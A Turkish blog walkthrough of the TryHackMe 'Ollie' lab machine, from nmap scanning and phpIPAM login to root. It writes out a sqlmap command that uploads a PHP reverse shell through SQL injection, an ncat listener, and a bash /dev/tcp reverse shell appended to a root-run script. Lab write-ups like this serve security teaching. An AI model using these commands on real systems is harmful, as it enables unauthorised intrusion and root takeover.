Merhabalar bu yazımda Tryhackme Ollie Makine Çözümü paylaşacağım.
1- İlk olarak nmap taraması ile portları tespit ederek başlıyorum. Çoğu zaman olduğu gibi 22. ve 80. ve 1337. port açık.
Dikkatlice baktığımda 1337 port açık ve içerisinde bazı konuşmalar gizlenmiş, nmap’in -sC parametresi direkt olarak karşıma çıkardı.
2-Bize giriş bilgilerini verdiğini tespit ettim. Bu bilgileri kaydederek devam ediyoruz.
İlginizi çekebilecek yazımız: Tryhackme Mindgames Çözümü
3- Ana sayfaya geldiğimde karşıma böyle bir login ekranı karşılıyor. Bilgileri girip içerisine giriş yapıyoruz.
Dikkatli baktığımda Phpıpam 1.4.5 tarzı bir versiyon olduğunu da fark ettim işimize yarama ihtimaline karşı bunu da not ediyoruz.
4- Arattığımda bir exploit karşımıza çıktı. İçerisinden araştırdım ama aktif olarak hedef sistemde çalışmıyor.
Exploit hedef sistemde çalışmadığı için burayı pas geçiyorum.
5- Makineye başlamadan önce ilk giriş ekranında SQL açığını da barındırdığına dair ipuçları görmüştüm.
Sol tarafta tek tek gezdim ama bir şey bulamadım, bende NAT alanında config kısmı içerisinden Map new subnet tarzı bir yer keşfettim.
Firefox ağ ayarlarına girip vekil sunucusunu kendi ayarla diyip tryhackme VPN ip adresinizi ve port olarak 8080 yazarak onaylıp burpsuite çalıştırıyoruz.
6- Proxy ayarları kısmından edit diyerek spesifik ip kısmından kendi tryhackme vpn ip adresini seçerek onaylıp tekrar ekrana geldim.
İntercept açık yaptım ve siteye geri döndüm. Artık direkt isteği buraya yansıtacak.
Site içerisinden search’e tıkladım ve evet direkt olarak karşımıza isteği getirdi.
Buradan sağ tık yapıp save item tıklayıp masaüstüne sql olarak kaydediyoruz.
7- Github üzerinden shelli indirebilirsiniz bende olduğu için indirmedim.
Bende ismi shell.php olarak kayıtlı isterseniz ismini shell.php olarak değiştirebilirsiniz, birazdan SQLMAP aracılığıyla hedef sisteme shell yükleyeceğiz.
İçerisine girip ip adresi ve port bilgilerini kendi makine ip adresim ve istediğim portla değiştirdim.
https://github.com/pentestmonkey/php-reverse-shell
8- Masaüstüne geçiş yaptım ve aşağıda ki komutları yazıp enter yapıyoruz.
Aşağıdaki komutlarda shell dosyasını hedef sistemde dizine yükle ve aktif hale getir demiş oluyoruz.
sqlmap -r sql –file-write=shell.php –file-dest=/var/www/html/shell.php –batch
9- Shell.php olarak hedef sistemde yüklü olduğunu tespit ettim. Artık ncat üzerinden bağlantı alarak bağlanmaya başlayabiliriz.
10- Ncat üzerinden bağlantı beklemeye başlıyorum.
11- Hedef makine uzantı yanına /shell.php ekledim ve çalıştırdığımda direkt olarak karşımıza bağlantı geldi.
Artık makinenin içerisindeyiz.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ bash kabuğuna geçiş yapabiliriz.
12- Www-data içerisinde yetki olmadığı için direkt olarak su ollie yazarak içerisine geçiş yapıyoruz.
Şifresi ilk başta bulduğumuz şifreydi hatırlarsanız.
13- Linpeas.sh tmp üzerinden yükledim ve detaylı araştırmama rağmen nasıl yetki yükseltebileceğimi bulamadım.
Diğer araç ile araştırma yapmaya devam ediyorum.
İsmi: pspy64 github üzerinden bulabilirsiniz.
14- Kendi makinem üzerinden içerisine yükledim yetki vererek çalıştırdım.
Bakalım burada tespit edebileceğiz mi.
15- Çok yavaş araştırma yapsa da etkili bir sonuç bulduk.
/usr/bin/feedme üzerinden direkt olarak root içerisine geçiş yapabiliriz.
16- Ncat ile 4444 portu üzerine bağlantı gelmesi için ayarlıyorum.
17- İçerisinden direkt olarak bash kabuğu reverse bağlantı alarak yetki yükseltebiliriz.
Bash olarak 4444 port içerisine bağlantı gönder diyoruz.
cat /usr/bin/feedme yazarak geri bağlantıyı aktif hale getiriyoruz.
echo “/bin/bash -i >& /dev/tcp/makineipadresiniz/4444 0>&1” >> /usr/bin/feedme
18- Direkt bayrağı okuduk ve makineyi bitirmiş olduk.
Tryhackme Ollie Makine Çözümü yazımızın sonuna geldik, yeni yazılarda görüşmek üzere..